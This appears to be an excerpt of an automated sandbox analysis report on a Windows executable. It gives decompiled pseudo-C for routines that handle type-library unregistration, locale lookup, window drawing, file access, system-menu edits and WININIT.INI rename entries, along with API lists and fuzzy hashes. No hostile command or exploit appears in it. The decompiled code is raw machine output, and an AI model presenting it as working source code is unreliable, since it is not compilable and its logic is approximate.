				_t34 =  *_t50(_t33,  *((intOrPtr*)(_t33 + 0x18)),  *((intOrPtr*)(_t33 + 0x1a)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *[fs:edx], 0x455c70, _t71);
				_t78 = _t34;
				if(_t34 != 0) {
					E00452810("UnRegisterTypeLib", _t50, _t34, _t67, _t69, _t78);
				}
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t37 = _v12;
				return  *((intOrPtr*)( *_t37 + 0x30))(_t37, _v16, E00455C77);
			}

0x00455b65
0x00455b67
0x00455b6f
0x00455b72
0x00455b76
0x00455b77
0x00455b7c
0x00455b7f
0x00455b97
0x00455b99
0x00455b9d
0x00455ba4
0x00455ba4
0x00455bae
0x00455bbb
0x00455bc2
0x00455bc4
0x00455bc4
0x00455bcb
0x00455bcc
0x00455bd1
0x00455bd4
0x00455bda
0x00455bdb
0x00455bde
0x00455bdf
0x00455be4
0x00455be6
0x00455bef
0x00455bef
0x00455bff
0x00455c06
0x00455c0c
0x00455c0f
0x00455c11
0x00455c1a
0x00455c1a
0x00455c2a
0x00455c2d
0x00455c43
0x00455c45
0x00455c47
0x00455c50
0x00455c50
0x00455c57
0x00455c5a
0x00455c66
0x00455c6f

APIs

GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00455CC9,?,?,00000031,?), ref: 00455B8C
GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455B92
LoadTypeLib.OLEAUT32(00000000,?), ref: 00455BDF

Part of subcall function 004527FC: GetLastError.KERNEL32(00000000,0045326D,00000005,00000000,004532A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,004966A1,00000000), ref: 004527FF

Strings

UnRegisterTypeLib, xrefs: 00455B82
LoadTypeLib, xrefs: 00455BEA
GetProcAddress, xrefs: 00455B9F
UnRegisterTypeLib, xrefs: 00455C4B
OLEAUT32.DLL, xrefs: 00455B87
ITypeLib::GetLibAttr, xrefs: 00455C15

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressErrorHandleLastLoadModuleProcType
String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
API String ID: 1914119943-2711329623
Opcode ID: 62cd571dd0a1fb17ba6e2c10dd29e3c4f0f3714fa1bfdf667f957769711da31b
Instruction ID: 2fc49365a89a4c45df309d680fa5544b7bb059dbf90ebb85ee18473684924132
Opcode Fuzzy Hash: 62cd571dd0a1fb17ba6e2c10dd29e3c4f0f3714fa1bfdf667f957769711da31b
Instruction Fuzzy Hash: 94319271600A04AFDB01EFAACD21D6BB7BDEF89701710846AF804D7652DA78D909CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0042E318 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0042E318(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t50;
				intOrPtr _t64;
				void* _t72;

				_v20 = 0;
				_v12 = 0;
				_push(_t72);
				_push(0x42e41d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t72 + 0xfffffff0;
				_t50 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetUserDefaultUILanguage");
				if(_t50 == 0) {
					if( *0x4980dc != 2) {
						if(E0042DD1C(0, "Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v8, 1, 0) == 0) {
							E0042DC4C();
							RegCloseKey(_v8);
						}
					} else {
						if(E0042DD1C(0, ".DEFAULT\\Control Panel\\International", 0x80000003,  &_v8, 1, 0) == 0) {
							E0042DC4C();
							RegCloseKey(_v8);
						}
					}
					E00403494( &_v20, 0x42e4c0);
					E0040357C( &_v20, _v12);
					E004029D8(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t50();
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E0042E424);
				E00403400( &_v20);
				return E00403400( &_v12);
			}

0x0042e323
0x0042e326
0x0042e32b
0x0042e32c
0x0042e331
0x0042e334
0x0042e34c
0x0042e350
0x0042e362
0x0042e3b7
0x0042e3c4
0x0042e3cd
0x0042e3cd
0x0042e364
0x0042e37f
0x0042e38c
0x0042e395
0x0042e395
0x0042e37f
0x0042e3da
0x0042e3e5
0x0042e3f0
0x0042e3fb
0x0042e3fb
0x0042e352
0x0042e352
0x0042e354
0x0042e401
0x0042e404
0x0042e407
0x0042e40f
0x0042e41c

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E41D,?,00000000,0047C7D8,00000000), ref: 0042E341
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E347
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E41D,?,00000000,0047C7D8,00000000), ref: 0042E395

Strings

.DEFAULT\Control Panel\International, xrefs: 0042E36C
Locale, xrefs: 0042E384
Control Panel\Desktop\ResourceLocale, xrefs: 0042E3A4
GetUserDefaultUILanguage, xrefs: 0042E337
kernel32.dll, xrefs: 0042E33C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 30aa4657558854c74bcf70448c9976bc0f4bc282bea39f31534e50f6e50fe7f1
Instruction ID: 0354af2e7925d05c70f612fecf04a6532964f813884163ad76eadf20e7b5e4a9
Opcode Fuzzy Hash: 30aa4657558854c74bcf70448c9976bc0f4bc282bea39f31534e50f6e50fe7f1
Instruction Fuzzy Hash: D2214430B00224ABDB00EBA7DC41B9F77B8EB44304FA04477A504E7282DB7C9A059A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00416D68 Relevance: 15.2, APIs: 10, Instructions: 167
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416D68(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t77;
				int _t130;
				void* _t131;
				void* _t152;
				void* _t153;
				void* _t154;
				struct HDC__* _t155;

				_v60.right = __ecx;
				_t155 = __edx;
				_t152 = __eax;
				_t76 =  *((intOrPtr*)(__eax + 0xb0));
				if( *((intOrPtr*)(__eax + 0xb0)) == 0) {
					L13:
					_t77 =  *(_t152 + 0xb4);
					if(_t77 == 0) {
						L23:
						return _t77;
					}
					_t77 =  *((intOrPtr*)(_t77 + 8)) - 1;
					if(_t77 < 0) {
						goto L23;
					}
					_v44.right = _t77 + 1;
					_t153 = 0;
					do {
						_t77 = E0040B424( *(_t152 + 0xb4), _t153);
						_t130 = _t77;
						if( *((char*)(_t130 + 0xc5)) != 0 && ( *(_t130 + 0x34) & 0x00000010) != 0 && ( *((char*)(_t130 + 0x37)) != 0 || ( *(_t130 + 0x1c) & 0x00000010) != 0 && ( *(_t130 + 0x35) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041A040(0x80000010));
							E0040AC20( *((intOrPtr*)(_t130 + 0x24)) - 1,  *((intOrPtr*)(_t130 + 0x24)) +  *((intOrPtr*)(_t130 + 0x2c)),  *((intOrPtr*)(_t130 + 0x28)) - 1,  &(_v44.right),  *((intOrPtr*)(_t130 + 0x28)) +  *((intOrPtr*)(_t130 + 0x30)));
							FrameRect(_t155,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041A040(0x80000014));
							E0040AC20( *((intOrPtr*)(_t130 + 0x24)),  *((intOrPtr*)(_t130 + 0x24)) +  *((intOrPtr*)(_t130 + 0x2c)) + 1,  *((intOrPtr*)(_t130 + 0x28)),  &(_v60.right),  *((intOrPtr*)(_t130 + 0x28)) +  *((intOrPtr*)(_t130 + 0x30)) + 1);
							FrameRect(_t155,  &_v60, _v60);
							_t77 = DeleteObject(_v68);
						}
						_t153 = _t153 + 1;
						_t73 =  &(_v44.right);
						 *_t73 = _v44.right - 1;
					} while ( *_t73 != 0);
					goto L23;
				}
				_t154 = 0;
				if(_v60.right != 0) {
					_t154 = E0040B46C(_t76, _v60.right);
					if(_t154 < 0) {
						_t154 = 0;
					}
				}
				_v60.bottom =  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0xb0)) + 8));
				if(_t154 >= _v60.bottom) {
					goto L13;
				} else {
					goto L5;
				}
				do {
					L5:
					_t131 = E0040B424( *((intOrPtr*)(_t152 + 0xb0)), _t154);
					if( *((char*)(_t131 + 0x37)) != 0 || ( *(_t131 + 0x1c) & 0x00000010) != 0 && ( *(_t131 + 0x35) & 0x00000004) == 0) {
						E0040AC20( *((intOrPtr*)(_t131 + 0x24)),  *((intOrPtr*)(_t131 + 0x24)) +  *(_t131 + 0x2c),  *((intOrPtr*)(_t131 + 0x28)),  &(_v44.bottom),  *((intOrPtr*)(_t131 + 0x28)) +  *(_t131 + 0x30));
						if(RectVisible(_t155,  &(_v44.top)) != 0) {
							if(( *(_t152 + 0x36) & 0x00000080) != 0) {
								 *(_t131 + 0x36) =  *(_t131 + 0x36) | 0x00000080;
							}
							_v60.top = SaveDC(_t155);
							E004141A0(_t155,  *((intOrPtr*)(_t131 + 0x28)),  *((intOrPtr*)(_t131 + 0x24)));
							IntersectClipRect(_t155, 0, 0,  *(_t131 + 0x2c),  *(_t131 + 0x30));
							E00415228(_t131, _t155, 0xf, 0);
							RestoreDC(_t155, _v80);
							 *(_t131 + 0x36) =  *(_t131 + 0x36) & 0x0000007f;
						}
					}
					_t154 = _t154 + 1;
				} while (_t154 < _v60.top);
				goto L13;
			}

0x00416d6f
0x00416d72
0x00416d74
0x00416d76
0x00416d7e
0x00416e61
0x00416e61
0x00416e69
0x00416f6e
0x00416f6e
0x00416f6e
0x00416e72
0x00416e75
0x00000000
0x00000000
0x00416e7c
0x00416e80
0x00416e82
0x00416e8a
0x00416e8f
0x00416e98
0x00416ed2
0x00416ef5
0x00416f00
0x00416f0a
0x00416f1f
0x00416f42
0x00416f4d
0x00416f57
0x00416f57
0x00416f5c
0x00416f5d
0x00416f5d
0x00416f5d
0x00000000
0x00416e82
0x00416d84
0x00416d8a
0x00416d94
0x00416d98
0x00416d9a
0x00416d9a
0x00416d98
0x00416da5
0x00416dad
0x00000000
0x00000000
0x00000000
0x00000000
0x00416db3
0x00416db3
0x00416dc0
0x00416dc6
0x00416df0
0x00416e02
0x00416e08
0x00416e0a
0x00416e0a
0x00416e14
0x00416e20
0x00416e32
0x00416e42
0x00416e4d
0x00416e52
0x00416e52
0x00416e02
0x00416e56
0x00416e57
0x00000000

APIs

RectVisible.GDI32(?,?), ref: 00416DFB
SaveDC.GDI32(?), ref: 00416E0F
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E32
RestoreDC.GDI32(?,?), ref: 00416E4D
CreateSolidBrush.GDI32(00000000), ref: 00416ECD
FrameRect.USER32 ref: 00416F00
DeleteObject.GDI32(?), ref: 00416F0A
CreateSolidBrush.GDI32(00000000), ref: 00416F1A
FrameRect.USER32 ref: 00416F4D
DeleteObject.GDI32(?), ref: 00416F57

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 3b27755b7b775f665e1a4bd51aa5187cf0cc76b725102093b065a9fda1b6c5e7
Instruction ID: f32214c97c751b668d9b6220275c8661121ed949f26fb06790abfa72b4305b5b
Opcode Fuzzy Hash: 3b27755b7b775f665e1a4bd51aa5187cf0cc76b725102093b065a9fda1b6c5e7
Instruction Fuzzy Hash: 40513B712086446FDB50EF29C8C0B9777E8AF48314F15466ABD49DB287C738EC81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ABF(void** __eax) {
				void* _t25;
				long _t26;
				void* _t27;
				long _t30;
				void* _t34;
				void* _t36;
				long _t37;
				int _t40;
				void* _t42;
				void* _t48;
				void* _t49;
				long _t50;
				long _t51;
				void* _t54;
				void** _t55;
				DWORD* _t56;

				_t55 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				_t25 =  *((intOrPtr*)(__eax + 4)) - 0xd7b1;
				if(_t25 == 0) {
					_t26 = 0x80000000;
					_t51 = 2;
					_t50 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = E00404A50;
					L8:
					_t55[9] = 0x404aa7;
					_t55[8] = E00404A77;
					if(_t55[0x12] == 0) {
						_t55[9] = E00404A77;
						if(_t55[1] == 0xd7b2) {
							_t27 = GetStdHandle(0xfffffff5);
						} else {
							_t27 = GetStdHandle(0xfffffff6);
						}
						if(_t27 == 0xffffffff) {
							L35:
							_t55[1] = 0xd7b0;
							return GetLastError();
						} else {
							 *_t55 = _t27;
							L28:
							if(_t55[1] == 0xd7b1) {
								L32:
								return 0;
							}
							_t30 = GetFileType( *_t55);
							if(_t30 == 0) {
								CloseHandle( *_t55);
								_t55[1] = 0xd7b0;
								return 0x69;
							}
							if(_t30 == 2) {
								_t55[8] = E00404A7A;
							}
							goto L32;
						}
					}
					_t34 = CreateFileA( &(_t55[0x12]), _t26, _t51, 0, _t50, 0x80, 0);
					if(_t34 == 0xffffffff) {
						goto L35;
					}
					 *_t55 = _t34;
					if(_t55[1] != 0xd7b3) {
						goto L28;
					}
					_t55[1] = _t55[1] - 1;
					_t36 = GetFileSize( *_t55, 0) + 1;
					if(_t36 == 0) {
						goto L35;
					}
					_t37 = _t36 - 0x81;
					if(_t37 < 0) {
						_t37 = 0;
					}
					if(SetFilePointer( *_t55, _t37, 0, 0) + 1 == 0) {
						goto L35;
					} else {
						_t40 = ReadFile( *_t55,  &(_t55[0x53]), 0x80, _t56, 0);
						_t54 = 0;
						if(_t40 != 1) {
							goto L35;
						}
						_t42 = 0;
						while(_t42 < _t54) {
							if( *((char*)(_t55 + _t42 + 0x14c)) == 0x1a) {
								if(SetFilePointer( *_t55, _t42 - _t54, 0, 2) + 1 == 0 || SetEndOfFile( *_t55) != 1) {
									goto L35;
								} else {
									goto L28;
								}
							}
							_t42 = _t42 + 1;
						}
						goto L28;
					}
				}
				_t48 = _t25 - 1;
				if(_t48 == 0) {
					_t26 = 0x40000000;
					_t51 = 1;
					_t50 = 2;
					L7:
					_t55[7] = E00404A7A;
					goto L8;
				}
				_t49 = _t48 - 1;
				if(_t49 == 0) {
					_t26 = 0xc0000000;
					_t51 = 1;
					_t50 = 3;
					goto L7;
				}
				return _t49;
			}

0x00404ac0
0x00404ac4
0x00404ac7
0x00404acd
0x00404ad2
0x00404adf
0x00404ae4
0x00404ae9
0x00404aee
0x00404b1e
0x00404b1e
0x00404b25
0x00404b30
0x00404be4
0x00404bf2
0x00404bfa
0x00404bf4
0x00404bfa
0x00404bfa
0x00404c02
0x00404c3f
0x00404c3f
0x00000000
0x00404c04
0x00404c04
0x00404c06
0x00404c0d
0x00404c26
0x00000000
0x00404c26
0x00404c11
0x00404c18
0x00404c2c
0x00404c31
0x00000000
0x00404c38
0x00404c1d
0x00404c1f
0x00404c1f
0x00000000
0x00404c1d
0x00404c02
0x00404b46
0x00404b4e
0x00000000
0x00000000
0x00404b54
0x00404b5d
0x00000000
0x00000000
0x00404b63
0x00404b6f
0x00404b70
0x00000000
0x00000000
0x00404b76
0x00404b7b
0x00404b7d
0x00404b7d
0x00404b8c
0x00000000
0x00404b92
0x00404ba7
0x00404bac
0x00404bae
0x00000000
0x00000000
0x00404bb4
0x00404bb6
0x00404bc2
0x00404bd6
0x00000000
0x00404be2
0x00000000
0x00404be2
0x00404bd6
0x00404bc4
0x00404bc4
0x00000000
0x00404bb6
0x00404b8c
0x00404ad4
0x00404ad5
0x00404af7
0x00404afc
0x00404b01
0x00404b17
0x00404b17
0x00000000
0x00404b17
0x00404ad7
0x00404ad8
0x00404b08
0x00404b0d
0x00404b12
0x00000000
0x00404b12
0x00000000

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
GetFileType.KERNEL32(?,000000F5), ref: 00404C11
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
GetLastError.KERNEL32(000000F5), ref: 00404C46

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D

Uniqueness

Uniqueness Score: -1.00%

Function 004221D0 Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004221D0(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x111)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x110) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x116)) != 1) {
							_t48 = GetSystemMenu(E004181C8( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x111)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x110) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x110) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x004221d7
0x004221e1
0x004221ea
0x004221f4
0x004221fd
0x00422207
0x00422220
0x0042222f
0x00422239
0x00422246
0x00422253
0x00422260
0x0042226d
0x0042227a
0x00000000
0x00422287
0x0042229b
0x004222a5
0x004222a5
0x004222ad
0x004222b7
0x00000000
0x004222c1
0x004222b7
0x00422207
0x004221f4
0x004222c8

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0042221B
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422239
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422246
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422253
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422260
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042226D
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042227A
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422287
EnableMenuItem.USER32 ref: 004222A5
EnableMenuItem.USER32 ref: 004222C1

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 954d5bf433075ec7648aab546171fff7003c2d4d21bf849177f088035aae9b75
Instruction ID: 718b179df737225d37d78316067442912e8fc999dc0e9ef0fec371aaac52ddb0
Opcode Fuzzy Hash: 954d5bf433075ec7648aab546171fff7003c2d4d21bf849177f088035aae9b75
Instruction Fuzzy Hash: F62136703447447AE720D725DD8BFAB7AD89F08718F0444A5B6447F2D3C7FDAA4086A8

Uniqueness

Uniqueness Score: -1.00%

Function 00452F6C Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00452F6C(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v41;
				char _v48;
				char _v52;
				void* __ecx;
				void* _t90;
				void* _t151;
				void* _t176;
				char _t178;
				intOrPtr _t180;
				intOrPtr _t188;
				intOrPtr _t195;
				intOrPtr _t219;
				intOrPtr _t229;
				intOrPtr _t230;

				_t227 = __esi;
				_t226 = __edi;
				_t229 = _t230;
				_t180 = 5;
				goto L1;
				L4:
				if(E0042DAF4(_t90) != 0) {
					if(_t176 == 0) {
						E00452E94(_v8, _t176, _t181,  &_v48, _t226, _t227);
						E00403494( &_v8, _v48);
						if(_v12 != 0) {
							E00452E94(_v12, _t176, _t181,  &_v48, _t226, _t227);
							E00403494( &_v12, _v48);
						}
					}
					if(E00452064(_t176, _v12, _v8, 5) == 0) {
						E004527FC("MoveFileEx");
					}
					_pop(_t195);
					 *[fs:eax] = _t195;
					_push(E004532A9);
					E00403420( &_v52, 2);
					E00403420( &_v40, 2);
					_t80 =  &_v24; // 0x496e5c
					return E00403420(_t80, 5);
				} else {
					E0042D83C( &_v16);
					E0042C3E4(_v16,  &_v48);
					E004035C0( &_v20, "WININIT.INI", _v48);
					_t21 =  &_v24; // 0x496e5c
					E00452B10(0, _t176, 0x4532cc, _v16, _t226, _t227, _t21);
					_push(_t229);
					_push(0x453201);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					_v28 = 0;
					_v32 = 0;
					_push(_t229);
					_push(0x4531ab);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					WritePrivateProfileStringA(0, 0, 0, E00403738(_v20));
					_v28 = E0044FA8C(1, 1, 0, 3);
					_t28 =  &_v24; // 0x496e5c
					_t188 =  *_t28;
					_v32 = E0044FA8C(1, 0, 1, 0);
					_v41 = 0;
					while(E0044FD20(_v28) == 0) {
						_t31 =  &_v36; // 0x496e25
						E0044FD30(_v28, _t31);
						_t178 = 1;
						_t34 =  &_v36; // 0x496e25
						E00406B90( *_t34,  &_v40);
						if(_v40 == 0 ||  *_v40 != 0x5b) {
							L11:
							_t40 =  &_v36; // 0x496e25
							E0044FF18(_v32, _t178, _t188,  *_t40, _t226, _t227);
							_t178 = 0;
							continue;
						} else {
							if(E00406AA4(_v40, "[rename]") != 0) {
								if(_v41 == 0) {
									goto L11;
								}
							} else {
								_v41 = 1;
								goto L11;
							}
						}
						break;
					}
					if(_v41 == 0) {
						E0044FF18(_v32, _t178, _t188, "[rename]", _t226, _t227);
					}
					if(_v12 == 0) {
						E00403494( &_v40, 0x4532f0);
					} else {
						E0042D7E8(_v12, _t188,  &_v40);
					}
					E00403494( &_v48, _v40);
					E0040357C( &_v48, 0x4532fc);
					_push( &_v48);
					E0042D7E8(_v8, _t188,  &_v52);
					_pop(_t151);
					E0040357C(_t151, _v52);
					E0044FF18(_v32, _t178, _t188, _v48, _t226, _t227);
					if(_t178 != 0) {
						_t58 =  &_v36; // 0x496e25
						E0044FF18(_v32, _t178, _t188,  *_t58, _t226, _t227);
					}
					while(E0044FD20(_v28) == 0) {
						_t60 =  &_v36; // 0x496e25
						E0044FD30(_v28, _t60);
						_t62 =  &_v36; // 0x496e25
						E0044FF18(_v32, _t178, _t188,  *_t62, _t226, _t227);
					}
					_pop(_t219);
					 *[fs:eax] = _t219;
					_push(E004531B2);
					E00402B58(_v32);
					return E00402B58(_v28);
				}
				L1:
				_push(0);
				_push(0);
				_t180 = _t180 - 1;
				if(_t180 != 0) {
					goto L1;
				} else {
					_push(_t180);
					_t1 =  &_v8;
					_t181 =  *_t1;
					 *_t1 = _t180;
					_push(__esi);
					_push(__edi);
					_v12 =  *_t1;
					_v8 = __edx;
					_t176 = __eax;
					E00403728(_v8);
					E00403728(_v12);
					_push(_t229);
					_push(0x4532a2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t230;
					E0042C7A8(_v8,  &_v48);
					_t90 = E00403494( &_v8, _v48);
					if(_v12 != 0) {
						E0042C7A8(_v12,  &_v48);
						_t90 = E00403494( &_v12, _v48);
					}
				}
				goto L4;
			}

0x00452f6c
0x00452f6c
0x00452f6d
0x00452f70
0x00452f70
0x00452fdb
0x00452fe2
0x0045321c
0x00453224
0x0045322f
0x00453238
0x00453240
0x0045324b
0x0045324b
0x00453238
0x00453261
0x00453268
0x00453268
0x0045326f
0x00453272
0x00453275
0x00453282
0x0045328f
0x00453294
0x004532a1
0x00452fe8
0x00452feb
0x00452ff6
0x00453006
0x0045300b
0x00453019
0x00453020
0x00453021
0x00453026
0x00453029
0x0045302e
0x00453033
0x00453038
0x00453039
0x0045303e
0x00453041
0x00453053
0x0045306d
0x00453076
0x00453076
0x00453085
0x00453088
0x004530e0
0x00453090
0x00453096
0x0045309b
0x004530a0
0x004530a3
0x004530ac
0x004530d3
0x004530d3
0x004530d9
0x004530de
